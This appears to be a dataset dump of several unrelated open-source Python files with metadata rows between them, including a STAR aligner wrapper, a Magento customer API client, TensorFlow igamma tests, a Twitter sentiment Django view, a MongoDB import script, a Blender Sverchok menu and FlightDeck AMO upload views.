shutil.move(star_file, out_file)
return out_file
def _read_group_option(names):
rg_id = names["rg"]
rg_sample = names["sample"]
rg_library = names["pl"]
rg_platform_unit = names["pu"]
rg_lb = ("LB:%s " % names.get("lb")) if names.get("lb") else ""
return (" --outSAMattrRGline ID:{rg_id} PL:{rg_library} "
"PU:{rg_platform_unit} SM:{rg_sample} {rg_lb}").format(**locals())
def _get_quality_format(config):
qual_format = config["algorithm"].get("quality_format", None)
if qual_format.lower() == "illumina":
return "fastq-illumina"
elif qual_format.lower() == "solexa":
return "fastq-solexa"
else:
return "fastq-sanger"
def remap_index_fn(ref_file):
"""Map sequence references to equivalent star indexes
"""
return os.path.join(os.path.dirname(os.path.dirname(ref_file)), "star")
def index(ref_file, out_dir, data):
"""Create a STAR index in the defined reference directory.
"""
(ref_dir, local_file) = os.path.split(ref_file)
gtf_file = dd.get_gtf_file(data)
if not utils.file_exists(gtf_file):
raise ValueError("%s not found, could not create a star index." % (gtf_file))
if not utils.file_exists(out_dir):
with tx_tmpdir(data, os.path.dirname(out_dir)) as tx_out_dir:
num_cores = dd.get_cores(data)
cmd = ("STAR --genomeDir {tx_out_dir} --genomeFastaFiles {ref_file} "
"--runThreadN {num_cores} "
"--runMode genomeGenerate --sjdbOverhang 99 --sjdbGTFfile {gtf_file}")
do.run(cmd.format(**locals()), "Index STAR")
if os.path.exists(out_dir):
shutil.rmtree(out_dir)
shutil.move(tx_out_dir, out_dir)
return out_dir
def get_star_version(data):
star_path = config_utils.get_program("STAR", dd.get_config(data))
cmd = "%s --version" % star_path
subp = subprocess.Popen(cmd, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
shell=True)
with contextlib.closing(subp.stdout) as stdout:
for line in stdout:
if "STAR_" in line:
version = line.split("STAR_")[1].strip()
return version
|
mit
| 9,177,149,942,006,414,000
| 40.42246
| 89
| 0.619287
| false
| 3.231539
| true
| false
| false
|
pauloacmelo/papelex_winthor
|
papelex_magento/customer.py
|
1
|
3621
|
# -*- coding: UTF-8 -*-
'''
magento.customer
Customer API for magento
:license: BSD, see LICENSE for more details
'''
from .api import API
class Customer(API):
"""
Customer API
Example usage::
from magento import Customer as CustomerAPI
with CustomerAPI(url, username, password) as customer_api:
return customer_api.list()
"""
__slots__ = ()
def list(self, filters=None):
"""
Retreive list of customers
:param filters: Dictionary of filters.
Format: `{<attribute>:{<operator>:<value>}}`
Example: `{'firstname':{'ilike':'sharoon'}}`
:return: List of dictionaries of matching records
"""
return self.call('customer.list', filters and [filters] or [{}])
def create(self, data):
"""
Create a customer using the given data
:param data: Dictionary of values
:return: Integer ID of new record
"""
return int(self.call('customer.create', [data]))
def info(self, id, attributes=None):
"""
Retrieve customer data
:param id: ID of customer
:param attributes: `List` of attributes needed
"""
if attributes:
return self.call('customer.info', [id, attributes])
else:
return self.call('customer.info', [id])
def update(self, id, data):
"""
Update a customer using the given data
:param id: ID of the customer record to modify
:param data: Dictionary of values
:return: Boolean
"""
return self.call('customer.update', [id, data])
def delete(self, id):
"""
Delete a customer
:param id: ID of customer to delete
:return: Boolean
"""
return self.call('customer.delete', [id])
class CustomerGroup(API):
"""
Customer Group API to connect to magento
"""
__slots__ = ()
def list(self):
"""
Retreive list of customers
:return: List of dictionaries of matching records
"""
return self.call('customer_group.list', [])
class CustomerAddress(API):
"""
Customer Address API
"""
__slots__ = ()
def list(self, customer_id):
"""
Retreive list of customer Addresses
:param customer_id: ID of customer whose address needs to be fetched
:return: List of dictionaries of matching records
"""
return self.call('customer_address.list', [customer_id])
def create(self, customer_id, data):
"""
Create a customer using the given data
:param customer_id: ID of customer, whose address is being added
:param data: Dictionary of values (country, zip, city, etc...)
:return: Integer ID of new record
"""
return int(self.call('customer_address.create', [customer_id, data]))
def info(self, id):
"""
Retrieve customer data
:param id: ID of customer
"""
return self.call('customer_address.info', [id])
def update(self, id, data):
"""
Update a customer address using the given data
:param id: ID of the customer address record to modify
:param data: Dictionary of values
:return: Boolean
"""
return self.call('customer_address.update', [id, data])
def delete(self, id):
"""
Delete a customer address
:param id: ID of address to delete
:return: Boolean
"""
return self.call('customer_address.delete', [id])
|
mit
| -3,507,494,974,233,864,700
| 23.972414
| 77
| 0.570008
| false
| 4.410475
| false
| false
| false
|
OpenLocalMap/OpenLocalMap
|
Python Version/xyCoordsLLPGClass.py
|
1
|
1326
|
# OpenLocalMap OpenSource web mapping for local government
# Copyright (C) <2014> <Ben Calnan>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import queryClass
class xyCoordsLLPGClass:
def __init__(self, uprn):
self.UPRN = uprn
self.getXYquery()
def getXYquery(self):
##print queryClass.getXYofLLPGpoint(self.UPRN)
self.xyQuery = queryClass.getXYofLLPGpoint(self.UPRN);
def getXYCoordsLLPG(self):
self.xy_DB = DBconn("LLPG")
self.setStid(xyQuery)
self.xyCoords = xy_DB.getSingleRow()
self.xyCoords = "{\"xyCoords\":[{\"X\":\"" + xyCoords['X'] + "\",\"Y\":\"" + xyCoords['Y'] + "\"}]}"
return self.xyCoords;
|
gpl-3.0
| -4,400,104,537,916,759,000
| 34.837838
| 108
| 0.665913
| false
| 3.55496
| false
| false
| false
|
devlights/try-python
|
trypython/stdlib/dis_/dis01.py
|
1
|
2422
|
# coding: utf-8
"""
dis モジュールについてのサンプルです。
"""
import dis
from trypython.common.commoncls import SampleBase
from trypython.common.commonfunc import hr
# noinspection SpellCheckingInspection
class Sample(SampleBase):
def exec(self):
##############################################
# dis モジュールは、pythonのバイトコードの
# 解析をサポートしてくれるモジュール。
#
# 大きく分けて2つの使い方がある
# 1) dis.dis()
# 2) dis.Bytecode()
#
# 1) は、指定された内容を逆アセンブルして出力してくれる。
# 引数の file に何も指定しない場合は標準出力に指定してくれる。
#
# 2) は、python 3.4 で追加されたAPI。
# 指定の仕方は 1) とほぼ変わらないが、いきなり結果を
# 出力ではなくて、一旦 Bytecode オブジェクトにラップして
# 返してくれる。
#
##############################################
listcomp_str = 'r = [x for x in range(1000000) if x % 2 == 0]'
forloop_str = '''
r = []
for x in range(1000000):
if x % 2 == 0:
r.append(x)
'''
###############################################
# dis.dis()
###############################################
hr('dis.dis(listcomp_str)')
dis.dis(listcomp_str)
hr('dis.dis(forloop_str)')
dis.dis(forloop_str)
###############################################
# dis.Bytecode()
#
# python 3.4 から dis モジュールに追加されたAPI。
# 内部で code オブジェクトや dis.code_info() の
# 結果を保持してくれたりするので、こちらの方が便利。
###############################################
hr('dis.Bytecode(listcomp_str)')
listcomp_bytecode = dis.Bytecode(listcomp_str)
print(listcomp_bytecode.codeobj)
print(listcomp_bytecode.dis())
print(listcomp_bytecode.info())
hr('dis.Bytecode(forloop_str)')
forloop_bytecode = dis.Bytecode(forloop_str)
print(forloop_bytecode.codeobj)
print(forloop_bytecode.dis())
print(forloop_bytecode.info())
def go():
obj = Sample()
obj.exec()
|
mit
| 6,764,128,687,262,864,000
| 25.540541
| 70
| 0.471487
| false
| 2.505102
| false
| false
| false
|
jhseu/tensorflow
|
tensorflow/compiler/tests/special_math_test.py
|
1
|
3535
|
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for special math operations."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
from absl import flags
from absl.testing import parameterized
import numpy as np
import scipy.special as sps
import six
from tensorflow.compiler.tests import xla_test
from tensorflow.python.ops import math_ops
from tensorflow.python.platform import test
flags.DEFINE_bool('vary_seed', False,
('Whether to vary the PRNG seed unpredictably. '
'With --runs_per_test=N, produces N iid runs.'))
NUM_SAMPLES = int(1e3)
class IgammaTest(xla_test.XLATestCase, parameterized.TestCase):
def setUp(self):
if flags.FLAGS.vary_seed:
entropy = os.urandom(64)
if six.PY2:
answer = int(entropy.encode('hex'), 16)
else:
answer = int.from_bytes(entropy, 'big')
np.random.seed(answer)
super(IgammaTest, self).setUp()
@parameterized.parameters((np.float32, 1e-2, 1e-11),
(np.float64, 1e-4, 1e-30))
def testIgammaSmallValues(self, dtype, rtol, atol):
# Test values near zero.
x = np.random.uniform(
low=np.finfo(dtype).tiny, high=1., size=[NUM_SAMPLES]).astype(dtype)
a = np.random.uniform(
low=np.finfo(dtype).tiny, high=1., size=[NUM_SAMPLES]).astype(dtype)
expected_values = sps.gammainc(a, x)
with self.session() as sess:
with self.test_scope():
actual = sess.run(math_ops.igamma(a, x))
self.assertAllClose(expected_values, actual, atol=atol, rtol=rtol)
@parameterized.parameters((np.float32, 1e-2, 1e-11),
(np.float64, 1e-4, 1e-30))
def testIgammaMediumValues(self, dtype, rtol, atol):
# Test values near zero.
x = np.random.uniform(low=1., high=100., size=[NUM_SAMPLES]).astype(dtype)
a = np.random.uniform(low=1., high=100., size=[NUM_SAMPLES]).astype(dtype)
expected_values = sps.gammainc(a, x)
with self.session() as sess:
with self.test_scope():
actual = sess.run(math_ops.igamma(a, x))
self.assertAllClose(expected_values, actual, atol=atol, rtol=rtol)
@parameterized.parameters((np.float32, 2e-2, 1e-5), (np.float64, 1e-4, 1e-30))
def testIgammaLargeValues(self, dtype, rtol, atol):
# Test values near zero.
x = np.random.uniform(
low=100., high=int(1e4), size=[NUM_SAMPLES]).astype(dtype)
a = np.random.uniform(
low=100., high=int(1e4), size=[NUM_SAMPLES]).astype(dtype)
expected_values = sps.gammainc(a, x)
with self.session() as sess:
with self.test_scope():
actual = sess.run(math_ops.igamma(a, x))
self.assertAllClose(expected_values, actual, atol=atol, rtol=rtol)
if __name__ == '__main__':
os.environ['XLA_FLAGS'] = '--xla_cpu_enable_fast_math=false'
test.main()
|
apache-2.0
| -5,683,867,419,198,845,000
| 34.707071
| 80
| 0.655446
| false
| 3.412162
| true
| false
| false
|
rahulpsd18/twitter-sentiment-analysis
|
website/views.py
|
1
|
2143
|
from django.shortcuts import render
from django.http import HttpResponse
from django.utils.datastructures import MultiValueDictKeyError
import os
import requests
import tweepy
from textblob import TextBlob
### For Logging purposes to console.. disable in production
# import logging
# logger = logging.getLogger(__name__)
def twitterHero(data,size):
consumer_key=os.environ.get('CONSUMER_KEY')
consumer_secret=os.environ.get('CONSUMER_SECRET')
access_token=os.environ.get('ACCESS_TOKEN')
access_token_secret=os.environ.get('ACCESS_TOKEN_SECRET')
auth=tweepy.OAuthHandler(consumer_key,consumer_secret)
auth.set_access_token(access_token,access_token_secret)
api=tweepy.API(auth)
S=[]
counter=[0,0,0] # positive, negative, neutral
for tweet in tweepy.Cursor(api.search, q=data, rpp=100, count=20, result_type="recent", include_entities=True, lang="en").items(size):
# logger.log(100,tweet) # MASSIVE DATA DUMP for debugging
analysis=TextBlob(tweet.text)
if analysis.sentiment.polarity > 0:
res='positive'
counter[0]+=1
elif analysis.sentiment.polarity == 0:
res='neutral'
counter[2]+=1
else:
res='negative'
counter[1]+=1
S.append((tweet.text,analysis.sentiment,res,tweet.user.name,tweet.user.profile_image_url_https,tweet.user.screen_name))
positivePer=(counter[0]/size)*100
negativePer=(counter[1]/size)*100
neutralPer=(counter[2]/size)*100
S.append((positivePer,negativePer,neutralPer))
return S
def index(request):
return render(request,'website/home.html',{})
def form_data(request):
try:
data=request.POST['q']
size=int(request.POST['size'])
except MultiValueDictKeyError:
data='data science'
size=50
if data=='':
data='data science'
S=twitterHero(data,size)
# logger.log(100,"Called function.")
posPer,negPer,ntrPer=S[-1][0],S[-1][1],S[-1][2]
del S[-1]
return render(request,'website/index.html',{'data':S,'search':data,'posPer':posPer,'negPer':negPer,'ntrPer':ntrPer})
|
mit
| -6,747,758,861,474,120,000
| 31.469697
| 138
| 0.669622
| false
| 3.380126
| false
| false
| false
|
romain-fontugne/ripeAtlasDetector
|
dataManipulation/mongoimport.py
|
1
|
2772
|
import os
import sys
import json
import glob
import pymongo
import datetime
import gzip
# def importMongo(path,collection, db=None):
# if db is None:
# client = pymongo.MongoClient("mongodb-ikebukuro")
# db = client.atlas
# col = db[collection]
# for filename in glob.glob(path):
# fi = open(filename)
# data = json.load(fi)
# print "%s: %s documents" % (filename, len(data))
# col.insert_many(data)
def importRangeOfDates(start, end, msmType, af=""):
if msmType != "builtin" and msmType != "anchor":
print "measurement type unknown!"
return
#TODO allow only af==4 or 6
# thus data is stored in collections traceroute4 or tracereoute6
if af=="":
aflabel = "4"
else:
aflabel = af
client = pymongo.MongoClient("mongodb-ikebukuro")
db = client.atlas
nbDays = (end-start).days
dateRange = [start+datetime.timedelta(x) for x in range(nbDays)]
for date in dateRange:
# colName = "traceroute_{year}_{month:02d}_{day:02d}".format(
colName = "traceroute{af}_{year}_{month:02d}_{day:02d}".format( af=af, year=date.year, month=date.month, day=date.day)
col = db[colName]
if date < datetime.datetime(2015,10,13):
# Data from Emile
filename = "/export/ripe/atlas/traceroute/{year}-{month:02d}-{day:02d}.gz".format(
year=date.year, month=date.month, day=date.day)
msmIdFile = "./%sMsmIdsv%s.txt" % (msmType, aflabel)
os.system("zcat %s | grep -f %s | mongoimport -h mongodb-ikebukuro -d atlas -c %s " % (
filename, msmIdFile, colName))
col.create_index("timestamp", background=True)
else:
pass # data are stored when downloaded
# Downloaded data
path = "../data/ipv{aflabel}/{msmType}/{year}/{month}/{year}-{month:02d}-{day:02d}*.json.gz".format(
aflabel=aflabel, msmType=msmType, year=date.year, month=date.month, day=date.day)
files = glob.glob(path)
files.sort() # insert data in chronological order
for filename in files:
fi = gzip.open(filename)
data = json.load(fi)
if len(data):
print filename
col.insert_many(data)
else:
print "%s is empty!" % filename
col.create_index("timestamp", background=True)
if __name__ == "__main__":
pass
# Don't use this:
# if len(sys.argv) < 3:
# print "usage: %s filesPattern collection" % sys.argv[0]
# else:
# importMongo(sys.argv[1], sys.argv[2])
|
gpl-2.0
| 6,064,794,230,779,179,000
| 31.611765
| 126
| 0.557359
| false
| 3.586028
| false
| false
| false
|
nortikin/sverchok
|
ui/nodeview_rclick_menu.py
|
1
|
12854
|
# This file is part of project Sverchok. It's copyrighted by the contributors
# recorded in the version control history of the file, available from
# its original location https://github.com/nortikin/sverchok/commit/master
#
# SPDX-License-Identifier: GPL3
# License-Filename: LICENSE
import bpy
from sverchok.utils.sv_node_utils import frame_adjust
from sverchok.menu import draw_add_node_operator
from sverchok.ui.presets import node_supports_presets, apply_default_preset
from sverchok.core.sockets import SvCurveSocket, SvSurfaceSocket, SvStringsSocket, SvSolidSocket
supported_mesh_viewers = {'SvMeshViewer', 'SvViewerDrawMk4'}
# for rclick i want convenience..
common_nodes = [
['GenVectorsNode', 'VectorsOutNode'],
['SvNumberNode', 'SvGenNumberRange'],
['SvScalarMathNodeMK4', 'SvVectorMathNodeMK3'],
['SvComponentAnalyzerNode'],
['---', 'NodeReroute', 'ListLengthNode']
]
def connect_idx_viewer(tree, existing_node, new_node):
# get connections going into vdmk2 and make a new idxviewer and connect the same sockets to that.
links = tree.links
links.new(existing_node.inputs[0].other, new_node.inputs[0])
def valid_active_node(nodes):
if nodes:
# a previously active node can remain active even when no nodes are selected.
if nodes.active and nodes.active.select:
return nodes.active
def has_outputs(node):
return node and len(node.outputs)
def get_output_sockets_map(node):
"""
because of inconsistent socket naming, we will use pattern matching (ignoring capitalization)
- verts: verts, vers, vertices, vectors, vecs (ver, vec)
- edges: edges, edgs, edgpol (edg)
- faces: faces, poly, pols, edgpol, (pol, fac)
For curves and surfaces checks if they belong to the corresponding class
> generally the first 3 outputs of a node will contain these
> generally if a node outputs polygons, it won't be necessary to connect edges
> if a node doesn't output polygons, only edges need to be connected
if the following code is in master, it will find the vast majority of mesh sockets,
in the case that it does not, dedicated lookup-tables for specific nodes are a consideration.
"""
output_map = {}
got_verts = False
got_edges = False
got_faces = False
got_curves = False
got_surface = False
got_solid = False
# we can surely use regex for this, but for now this will work.
for socket in node.outputs:
if socket.hide or socket.hide_safe:
continue
socket_name = socket.name.lower()
if not got_verts and ('ver' in socket_name or 'vec' in socket_name):
output_map['verts'] = socket.name
got_verts = True
elif not got_edges and 'edg' in socket_name and isinstance(socket, SvStringsSocket):
output_map['edges'] = socket.name
got_edges = True
elif not got_faces and ('face' in socket_name or 'pol' in socket_name) and isinstance(socket, SvStringsSocket):
output_map['faces'] = socket.name
got_faces = True
elif not got_curves and isinstance(socket, SvCurveSocket):
output_map['curve'] = socket.name
got_curves = True
elif not got_surface and isinstance(socket, SvSurfaceSocket):
output_map['surface'] = socket.name
got_surface = True
elif not got_solid and isinstance(socket, SvSolidSocket):
output_map['solid'] = socket.name
got_solid = True
return output_map
def offset_node_location(existing_node, new_node, offset):
new_node.location = existing_node.location.x + offset[0] + existing_node.width, existing_node.location.y + offset[1]
def conect_to_3d_viewer(tree):
if hasattr(tree.nodes.active, 'viewer_map'):
view_node(tree)
else:
add_connection(tree, bl_idname_new_node="SvViewerDrawMk4", offset=[60, 0])
def view_node(tree):
'''viewer map is a node attribute to inform to the operator how to visualize
the node data
it is a list with two items.
The first item is a list with tuples, every tuple need to have the node bl_idanme and offset to the previous node
The second item is a list with tuples, every tuple indicates a link.
The link is defined by two pairs of numbers, referring to output and input
The first number of every pair indicates the node being 0 the active node 1 the first needed node and so on
The second nmber of every pair indicates de socket index.
So to say: create a Viewer Draw with a offset of 60,0 and connect the first output to the vertices input
the node would need to have this:
viewer_map = [
("SvViewerDrawMk4", [60, 0])
], [
([0, 0], [1, 0])
]
'''
nodes = tree.nodes
links = tree.links
existing_node = nodes.active
node_list = [existing_node]
output_map = existing_node.viewer_map
previous_state = tree.sv_process
tree.sv_process = False
for node in output_map[0]:
bl_idname_new_node, offset = node
new_node = nodes.new(bl_idname_new_node)
apply_default_preset(new_node)
offset_node_location(node_list[-1], new_node, offset)
frame_adjust(node_list[-1], new_node)
node_list.append(new_node)
for link in output_map[1]:
output_s, input_s = link
links.new(node_list[output_s[0]].outputs[output_s[1]],
node_list[input_s[0]].inputs[input_s[1]])
tree.sv_process = previous_state
tree.update()
def add_connection(tree, bl_idname_new_node, offset):
nodes = tree.nodes
links = tree.links
output_map = get_output_sockets_map(nodes.active)
existing_node = nodes.active
if isinstance(bl_idname_new_node, str):
# single new node..
new_node = nodes.new(bl_idname_new_node)
apply_default_preset(new_node)
offset_node_location(existing_node, new_node, offset)
frame_adjust(existing_node, new_node)
outputs = existing_node.outputs
inputs = new_node.inputs
if existing_node.bl_idname in supported_mesh_viewers and bl_idname_new_node == 'SvIDXViewer28':
new_node.draw_bg = True
connect_idx_viewer(tree, existing_node, new_node)
elif bl_idname_new_node == 'SvStethoscopeNodeMK2':
# we can't determine thru cursor location which socket was nearest the rightclick
# maybe in the future.. or if someone does know :)
for socket in outputs:
if socket.hide:
continue
# connect_stethoscope to first visible output socket of active node
links.new(socket, inputs[0])
break
tree.update() # without this the node won't show output until an update is triggered manually
# existing_node.process_node(None)
elif bl_idname_new_node == 'SvViewerDrawMk4':
previous_state = tree.sv_process
tree.sv_process = False
if 'verts' in output_map:
links.new(outputs[output_map['verts']], inputs[0])
if 'faces' in output_map:
links.new(outputs[output_map['faces']], inputs[2])
if 'edges' in output_map:
links.new(outputs[output_map['edges']], inputs[1])
elif 'curve' in output_map:
eval_node = nodes.new('SvExEvalCurveNode')
apply_default_preset(eval_node)
offset_node_location(existing_node, eval_node, offset)
frame_adjust(existing_node, eval_node)
offset_node_location(eval_node, new_node, offset)
frame_adjust(eval_node, new_node)
links.new(outputs[output_map['curve']], eval_node.inputs[0])
links.new(eval_node.outputs[0], inputs[0])
links.new(eval_node.outputs[1], inputs[1])
elif 'surface' in output_map:
eval_node = nodes.new('SvExEvalSurfaceNode')
apply_default_preset(eval_node)
offset_node_location(existing_node, eval_node, offset)
frame_adjust(existing_node, eval_node)
offset_node_location(eval_node, new_node, offset)
frame_adjust(eval_node, new_node)
links.new(outputs[output_map['surface']], eval_node.inputs[0])
links.new(eval_node.outputs[0], inputs[0])
links.new(eval_node.outputs[1], inputs[1])
links.new(eval_node.outputs[2], inputs[2])
elif 'solid' in output_map:
tree.nodes.remove(new_node)
new_node = nodes.new('SvSolidViewerNode')
apply_default_preset(new_node)
offset_node_location(existing_node, new_node, offset)
frame_adjust(existing_node, new_node)
links.new(outputs[output_map['solid']], new_node.inputs[0])
tree.sv_process = previous_state
tree.update()
# existing_node.process_node(None)
else:
...
elif isinstance(bl_idname_new_node, list):
# maybe vdmk2 + indexviewer
...
class SvGenericDeligationOperator(bpy.types.Operator):
bl_idname = "node.sv_deligate_operator"
bl_label = "Execute generic code"
fn: bpy.props.StringProperty(default='')
def execute(self, context):
tree = context.space_data.edit_tree
if self.fn == 'vdmk2':
conect_to_3d_viewer(tree)
elif self.fn == 'vdmk2 + idxv':
add_connection(tree, bl_idname_new_node=["SvViewerDrawMk4", "SvIDXViewer28"], offset=[180, 0])
elif self.fn == '+idxv':
add_connection(tree, bl_idname_new_node="SvIDXViewer28", offset=[180, 0])
elif self.fn == 'stethoscope':
add_connection(tree, bl_idname_new_node="SvStethoscopeNodeMK2", offset=[60, 0])
return {'FINISHED'}
class SvNodeviewRClickMenu(bpy.types.Menu):
bl_label = "Right click menu for Sverchok"
bl_idname = "NODEVIEW_MT_sv_rclick_menu"
@classmethod
def poll(cls, context):
tree_type = context.space_data.tree_type
return tree_type in {'SverchCustomTreeType', }
def draw(self, context):
layout = self.layout
layout.operator_context = 'INVOKE_REGION_WIN'
tree = context.space_data.edit_tree
try:
nodes = tree.nodes
except:
layout.operator("node.new_node_tree", text="New Sverchok Node Tree", icon="RNA_ADD")
return
node = valid_active_node(nodes)
if node:
if hasattr(node, "rclick_menu"):
node.rclick_menu(context, layout)
layout.separator()
if len(node.outputs):
layout.menu('SV_MT_AllSocketsOptionsMenu', text='Outputs post-process')
layout.separator()
if node.bl_idname in {'SvViewerDrawMk4', 'SvBmeshViewerNodeMK2'}:
layout.operator("node.sv_deligate_operator", text="Connect IDXViewer").fn = "+idxv"
else:
if has_outputs(node):
layout.operator("node.sv_deligate_operator", text="Connect ViewerDraw").fn = "vdmk2"
if len(node.outputs):
layout.operator("node.sv_deligate_operator", text="Connect stethoscope").fn = "stethoscope"
layout.separator()
if node_supports_presets(node):
layout.menu('SV_MT_LoadPresetMenu', text="Node Presets")
if node and node.bl_idname == 'NodeFrame':
# give options for Frame nodes..
col = layout.column(align=True)
col.prop(node, 'label', text='', icon='NODE')
col.prop(node, 'use_custom_color')
if node.use_custom_color:
col.prop(node, 'color', text='')
col.prop(node, 'label_size', slider=True)
col.prop(node, 'shrink')
layout.separator()
layout.menu("NODEVIEW_MT_Dynamic_Menu", text='node menu')
# layout.operator("node.duplicate_move")
self.draw_conveniences(context, node)
def draw_conveniences(self, context, node):
layout = self.layout
layout.separator()
for nodelist in common_nodes:
for named_node in nodelist:
if named_node == '---':
layout.separator()
else:
draw_add_node_operator(layout, named_node)
def register():
bpy.utils.register_class(SvGenericDeligationOperator)
bpy.utils.register_class(SvNodeviewRClickMenu)
def unregister():
bpy.utils.unregister_class(SvNodeviewRClickMenu)
bpy.utils.unregister_class(SvGenericDeligationOperator)
|
gpl-3.0
| 4,325,409,515,242,083,300
| 36.805882
| 121
| 0.619885
| false
| 3.74643
| false
| false
| false
|
acsone/mozaik
|
mozaik_account/__openerp__.py
|
1
|
1753
|
# -*- coding: utf-8 -*-
##############################################################################
#
# This file is part of mozaik_account, an Odoo module.
#
# Copyright (c) 2015 ACSONE SA/NV (<http://acsone.eu>)
#
# mozaik_account is free software:
# you can redistribute it and/or
# modify it under the terms of the GNU Affero General Public License
# as published by the Free Software Foundation, either version 3 of
# the License, or (at your option) any later version.
#
# mozaik_account is distributed in the hope that it will
# be useful but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the
# GNU Affero General Public License
# along with mozaik_account.
# If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'MOZAIK: Account',
'version': '1.0.1',
"author": "ACSONE SA/NV",
"maintainer": "ACSONE SA/NV",
"website": "http://www.acsone.eu",
'category': 'Political Association',
'depends': [
'account_accountant',
'account_cancel',
'account_auto_installer',
'mozaik_mandate',
],
'description': """
MOZAIK Account
==============
Manage accounting features
""",
'images': [
],
'data': [
'security/account_security.xml',
'account_view.xml',
],
'qweb': [
],
'demo': [
],
'test': [
],
'license': 'AGPL-3',
'sequence': 150,
'installable': True,
'auto_install': False,
'application': False,
}
|
agpl-3.0
| 5,313,263,469,645,565,000
| 28.216667
| 78
| 0.547633
| false
| 3.794372
| false
| false
| false
|
mozilla/FlightDeck
|
apps/amo/views.py
|
1
|
5070
|
import commonware.log
import simplejson
from django.shortcuts import get_object_or_404 # render_to_response,
from django.http import HttpResponse, HttpResponseBadRequest
from amo import tasks
from amo.constants import STATUS_UPLOAD_FAILED, STATUS_UPLOAD_SCHEDULED
from amo.helpers import get_addon_details as _get_addon_details
from jetpack.models import PackageRevision
#from utils.exceptions import SimpleException
log = commonware.log.getLogger('f.amo')
def upload_to_amo(request, pk):
"""Upload a XPI to AMO
"""
# check if there this Add-on was uploaded with the same version name
revision = get_object_or_404(PackageRevision, pk=pk)
version = revision.get_version_name()
uploaded = PackageRevision.objects.filter(
package=revision.package).filter(
amo_version_name=version).exclude(
amo_status=None).exclude(
amo_status=STATUS_UPLOAD_FAILED).exclude(
amo_status=STATUS_UPLOAD_SCHEDULED)
if len(uploaded) > 0:
log.debug("This Add-on was already uploaded using version \"%s\"" % version)
log.debug(revision.amo_status)
return HttpResponseBadRequest("This Add-on was already uploaded using version \"%s\"" % version)
try:
PackageRevision.objects.get(
package=revision.package, amo_version_name=version,
amo_status=STATUS_UPLOAD_SCHEDULED)
except PackageRevision.DoesNotExist:
pass
else:
log.debug("This Add-on is currently scheduled to upload")
return HttpResponseBadRequest("This Add-on is currently scheduled to upload")
log.debug('AMOOAUTH: Scheduling upload to AMO')
tasks.upload_to_amo.delay(pk)
return HttpResponse('{"delayed": true}')
def get_addon_details_from_amo(request, pk):
""" Finds latest revision uploaded to AMO and pulls metadata from AMO
using `generic AMO API <https://developer.mozilla.org/en/addons.mozilla.org_%28AMO%29_API_Developers%27_Guide/The_generic_AMO_API>`_
:attr: pk (int) :class:`~jetpack.models.PackageRevision` primary key
:returns: add-on metadata or empty dict in JSON format
"""
# get PackageRevision
revision = get_object_or_404(PackageRevision, pk=pk)
# check if Package is synced with the AMO and last update was successful
if (not revision.package.amo_id
or revision.amo_status == STATUS_UPLOAD_FAILED):
return HttpResponse('{}')# mimetype="application/json")
# pull info
amo_meta = _get_addon_details(revision.package.amo_id,
revision.amo_file_id)
if 'deleted' in amo_meta:
# remove info about the amo_addon from Package
revision.package.amo_id = None
revision.package.amo_slug = None
revision.package.latest_uploaded = None
revision.package.save()
# remove info about uploads from revisions
revisions = revision.package.revisions.all()
for r in revisions:
r.amo_status = None
r.amo_version_name = None
r.amo_file_id = None
super(PackageRevision, r).save()
return HttpResponse(simplejson.dumps(amo_meta))
# update amo package data
amo_slug = amo_meta.get('slug', None)
if (amo_slug and
(not revision.package.amo_slug
or revision.package.amo_slug != amo_slug)):
revision.package.amo_slug = amo_slug
revision.package.save()
if amo_slug:
amo_meta['view_on_amo_url'] = revision.package.get_view_on_amo_url()
amo_meta['edit_on_amo_url'] = revision.package.get_edit_on_amo_url()
# update amo revision data
if ('version' in amo_meta
and amo_meta['version'] == revision.amo_version_name):
revision.amo_status = int(amo_meta['status_code'])
super(PackageRevision, revision).save()
return HttpResponse(simplejson.dumps(amo_meta),
mimetype="application/json")
def get_addon_details(request, pk):
"""Provide currently stored AMO Status (without contacting to AMO)
:attr: pk (int) :class:`~jetpack.models.PackageRevision` primary key
:returns: add-on metadata or empty dict in JSON format
"""
# get PackageRevision
revision = get_object_or_404(PackageRevision, pk=pk)
# check if Package was scheduled for upload
if revision.amo_status == None:
return HttpResponse('{}', mimetype="application/json")
amo_meta = {'status': revision.get_status_name(),
'status_code': revision.amo_status,
'version': revision.amo_version_name,
'get_addon_info_url': revision.get_status_url(),
'pk': revision.pk,
'uploaded': revision.amo_status != STATUS_UPLOAD_FAILED}
if revision.package.amo_slug:
amo_meta['view_on_amo_url'] = revision.package.get_view_on_amo_url()
amo_meta['edit_on_amo_url'] = revision.package.get_edit_on_amo_url()
return HttpResponse(simplejson.dumps(amo_meta),
mimetype="application/json")
|
bsd-3-clause
| -3,445,110,804,472,861,000
| 39.56
| 136
| 0.657791
| false
| 3.912037
| false
| false
| false
|
nicholas-moreles/blaspy
|
blaspy/config.py
|
1
|
1951
|
"""
Copyright (c) 2014-2015-2015, The University of Texas at Austin.
All rights reserved.
This file is part of BLASpy and is available under the 3-Clause
BSD License, which can be found in the LICENSE file at the top-level
directory or at http://opensource.org/licenses/BSD-3-Clause
"""
from .errors import raise_blas_os_error
from ctypes import cdll
from os import chdir, path
from platform import system
from struct import calcsize
# The name of the BLAS .so or .dll file. By default this is the OpenBLAS reference
# implementation bundled with BLASpy. Only modify if you wish to use a different version of BLAS
# or if your operating system is not supported by BLASpy out of the box.
BLAS_NAME = "" # default is ""
